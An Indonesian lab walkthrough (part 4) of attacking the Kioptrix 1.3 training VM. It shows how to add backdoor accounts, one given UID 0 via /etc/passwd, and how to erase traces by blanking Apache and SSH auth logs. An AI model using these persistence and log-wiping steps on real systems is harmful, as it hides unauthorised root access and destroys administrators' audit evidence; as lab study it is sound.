Penetration Testing Kioptrix Server 1.3: Backdoor dan Menghapus Jejak [4]

hacking Jan 05, 2020

Setelah mendapatkan akses root maka perlu segera membuat backdoor(pintu belakang) untuk bisa mengakses server lagi dengan mudah tanpa perlu cara panjang seperti sebelumnya. Dan juga diperlukan menghapus jejak yang telah dibuat agar tidak mudah diketahui oleh admin server jika terjadi perubahan.
Dalam kasus ini akan dibuat 2 user sebagai backdoor yaitu nanika sebagai user dengan akses terbatas dan luffy dengan akses super user (root).

  1. Jalankan perintah untuk membuat user nanika :
useradd nanika

lalu

passwd nanika

masukan password..

note: password yang diketika tidak akan terlihat pada terminal.
DeepinScreenshot_select-area_20200104201724

  1. Membuat home directory untuk user nanika :
mkdir /home/nanika
  1. Lalu modifikasi pada file /etc/passwd pada bagian nanika :
vim /etc/passwd

rubah bagian :
nanika:x:1003:1003::/home/nanika:/bin/sh
menjadi
nanika:x:1003:1003::/home/nanika:/bin/kshell
kesimpulan :
kshell artinya user nanika akan mendapatkan akses terbatas seperti waktu john pertama kali digunakan.

  1. Selanjutnya check user nanika dengan login ssh sebagai nanika.
    DeepinScreenshot_select-area_20200104202545

  2. Buat lagi user dengan akses root. Terserah dengan nama apa :

useradd luffy
passwd luffy
mkdir /home/luffy
vim /etc/passwd

rubah bagian :
luffy:x:1004:1004::/home/luffy:/bin/sh
menjadi
luffy:x:0:0::/home/luffy:/bin/bash
kesimpulan :
bash artinya user luffy akan mendapatkan akses root.
DeepinScreenshot_select-area_20200104203045.

  1. Selanjutny adalah dengan menghapus jejak yang telah dilakukan. Agar tidak mudah diketahui admin kalau terjadi perubahan pada server.

  2. Pertama-tama kembalikan hak akses john. Dengan edit file /etc/passwd
    dari
    john:x:0:0:,,,:/home/john:/bin/bash
    menjadi
    john:x:1001:1001:,,,:/home/john:/bin/kshell

  3. Kembalikan hak akses file /etc/passwd dengan perintah :

chmod 644 /etc/passwd

DeepinScreenshot_select-area_20200104203730

  1. Menghapus seluruh file log service. Setiap layanan http dan ssh akan menyimpan segala bentuk perubahan yang terjadi dalam koneksi layanan masing-masing. Seluruh file log berapa pada directory /var/log.
    DeepinScreenshot_select-area_20200104220808

  2. Dari seluruh list layanan pada log, pada kasus ini layanan apache2 dan ssh yang akan dihapus.

  3. Pertama layanan apache2, masuk ke dalam directory apache dengan perintah :

cd /var/log/apache2

DeepinScreenshot_select-area_20200104220900

note: jangan dihapus tapi ditimpa saja agar isi file tersebut kosong.

berikut isi dari access.log.1 :
DeepinScreenshot_select-area_20200104221040

dapat dilihat pada gambar tersebut bahwa semua aktivitas penetrasi yang telah dilakukan tercatat disana dan bahkan ip address yang digunakan oleh penyerang tercatat disana.

  1. Selanjut timpa file tersebut agar menjadi kosong. ingat jangan dihapus. Dengan perintah :
echo>access.log
echo>access.log.1
echo>error.log
echo>error.log.1

DeepinScreenshot_select-area_20200104221453

  1. Selanjutnya adalah layanan ssh pada file /var/log/auth.log. untuk melihat isi file tersebut :
cat /var/log/auth.log

DeepinScreenshot_select-area_20200104222600

  1. Timpa dengan perintah :
echo>/var/log/auth.log

DeepinScreenshot_select-area_20200104222649

Gokiiiiiiiillll, Sampai sini telah selesai aktivitas penetrasi testing pada server Kioptrix 1.3.. Semoga bermanfaat dan jika ada salah mohon komentar dibawah sobat. Terimakasih. ^_^

Akhmad Syarif

i just want to be myself